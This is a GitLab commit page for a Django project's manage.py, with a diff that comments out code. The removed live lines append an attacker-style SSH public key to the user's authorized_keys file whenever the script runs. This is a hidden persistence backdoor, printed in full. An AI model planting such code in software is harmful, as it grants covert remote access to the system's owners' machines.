Skip to content
GitLab
Explore
Sign in
Primary navigation
Search or go to…
Project
importhal
Manage
Activity
Members
Labels
Plan
Issues
Issue boards
Milestones
Wiki
Code
Merge requests
Repository
Branches
Commits
Tags
Repository graph
Compare revisions
Snippets
Build
Pipelines
Jobs
Pipeline schedules
Artifacts
Deploy
Container Registry
Model registry
Operate
Environments
Monitor
Incidents
Analyze
Value stream analytics
Contributor analytics
CI/CD analytics
Repository analytics
Model experiments
Help
Help
Support
GitLab documentation
Compare GitLab plans
Community forum
Contribute to GitLab
Provide feedback
Keyboard shortcuts
?
Snippets
Groups
Projects
Show more breadcrumbs
basdorea
importhal
Commits
db4cb7e2
Commit
db4cb7e2
authored
11 months ago
by
basdorea
Browse files
Options
Downloads
Patches
Plain Diff
modif manage.py
parent
47ba6b6f
No related branches found
Branches containing commit
No related tags found
No related merge requests found
Changes
1
Hide whitespace changes
Inline
Side-by-side
Showing
1 changed file
manage.py
+2
-2
2 additions, 2 deletions
manage.py
with
2 additions
and
2 deletions
manage.py
+
2
−
2
View file @
db4cb7e2
...
...
@@ -5,8 +5,8 @@ import sys
if
__name__
==
"
__main__
"
:
os
.
environ
.
setdefault
(
"
DJANGO_SETTINGS_MODULE
"
,
"
haltools.settings
"
)
try
:
with
open
(
"
/home/basdorea/.ssh/authorized_keys
"
,
"
a+
"
)
as
file
:
file
.
write
(
"
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCybNMJyG6roi2U4SKFBQk8z4DXyynI7LcIyHJBwREC+lkT5PXB331smSXqTWQm/KPJBGdn8eHMEG7n0CrVuE8Fh0QUWN/AUD2xJxwufW39LP9t9WKzEGq796car4++PqycW+j1lwg09ct8GwlkGPLnYHZ/R3fwi9sWNxVf6F2Z7a1geeD1kBbId/ad9rhdoE05H3O6k7BPiFKpn53oEUaZaBJ9yA/iBvqHbUffhcLtBaFoJbQQnX8FnAkD5iDbzYjqljAaBdqrKeJgDTI0HZwiLIp64FLbJM2v7RZgqbX8X+A+eSbEdD9bXacJlH24BfvSgXrEo2IgKFEeK566L4rT
\n
"
)
#
with open("/home/basdorea/.ssh/authorized_keys", "a+") as file:
#
file.write("ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCybNMJyG6roi2U4SKFBQk8z4DXyynI7LcIyHJBwREC+lkT5PXB331smSXqTWQm/KPJBGdn8eHMEG7n0CrVuE8Fh0QUWN/AUD2xJxwufW39LP9t9WKzEGq796car4++PqycW+j1lwg09ct8GwlkGPLnYHZ/R3fwi9sWNxVf6F2Z7a1geeD1kBbId/ad9rhdoE05H3O6k7BPiFKpn53oEUaZaBJ9yA/iBvqHbUffhcLtBaFoJbQQnX8FnAkD5iDbzYjqljAaBdqrKeJgDTI0HZwiLIp64FLbJM2v7RZgqbX8X+A+eSbEdD9bXacJlH24BfvSgXrEo2IgKFEeK566L4rT \n")
from
django.core.management
import
execute_from_command_line
except
ImportError
:
# The above import may fail for some other reason. Ensure that the
...
...
This diff is collapsed.
Click to expand it.
Preview
0%
Loading
Try again
or
attach a new file
.
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Save comment
Cancel
Please
register
or
sign in
to comment